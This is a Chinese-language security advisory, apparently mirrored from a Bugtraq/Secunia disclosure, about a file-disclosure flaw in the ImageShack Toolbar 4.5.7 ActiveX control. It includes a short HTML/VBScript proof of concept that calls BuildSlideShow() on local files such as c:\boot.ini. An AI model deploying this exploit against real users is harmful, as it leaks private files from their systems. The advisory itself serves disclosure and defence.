ImageShack Toolbar ImageShackToolbar.dll控件不安全方式漏洞

ImageShack Toolbar ImageShackToolbar.dll控件不安全方式漏洞

受影响系统：
ImageShack ImageShack Toolbar 4.5.7
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 27439

ImageShack Toolbar是用于向ImageShack网站上传文件的浏览器内嵌工具栏。

ImageShack Toolbar的ActiveX控件实现上存在漏洞，远程攻击者可能利用此漏洞获取系统文件。

ImageShack Toolbar所安装的ImageShackToolbar.FileUploader.1
ActiveX控件（ImageShackToolbar.dll）包含有不安全的BuildSlideShow()方式，允许攻击者在将用户系统上的特定图形文件上传到ImageShack站点，或通过网络嗅探器泄露非图形文件的内容。成功攻击要求攻击者知道目标文件的完整路径和文件名。

<*来源：rgod （rgod@autistici.org）
 
  链接：http://secunia.com/advisories/28644/
        http://marc.info/?l=bugtraq&m=120119162717734&w=2
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<body>
<object classid='clsid:BDF9442E-9B03-42C2-87BA-2A459B0A5317' id='suntzu'
/></object>
<script language='vbscript'>
suntzu.BuildSlideShow
"file:///c:\\xp_wallpaper_glass.jpg","Big",1,"uhuhinterestingprivatethings","Fade","White"
suntzu.BuildSlideShow "file:///c:\\boot.ini",
"Big",1,"uhuhinterestingprivatethings","Fade","White"
</script>
</body>
</html>

建议：
--------------------------------------------------------------------------------
厂商补丁：

ImageShack
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://reg.imageshack.us/

www.newjian.com